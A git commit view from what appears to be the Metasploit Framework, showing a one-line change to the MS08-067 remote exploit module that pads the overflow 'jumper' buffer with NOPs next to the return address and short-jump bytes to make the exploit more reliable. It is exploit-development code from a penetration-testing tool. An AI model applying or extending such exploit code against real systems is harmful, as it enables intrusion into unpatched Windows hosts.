Patch for ms08-067 from antoine, fixes braindead bug on my part, should increase reliability
git-svn-id: file:///home/svn/framework3/trunk@5805 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a4d53893ac
commit
dfbc35da3c
|
@ -223,6 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
jumper = Rex::Text.rand_text_alpha(70).upcase
|
jumper = Rex::Text.rand_text_alpha(70).upcase
|
||||||
jumper[ 4,4] = [target.ret].pack("V")
|
jumper[ 4,4] = [target.ret].pack("V")
|
||||||
|
jumper[56,2] = make_nops(2)
|
||||||
jumper[58,2] = "\xeb\x62"
|
jumper[58,2] = "\xeb\x62"
|
||||||
|
|
||||||
path =
|
path =
|
||||||
|
|
Loading…
Reference in New Issue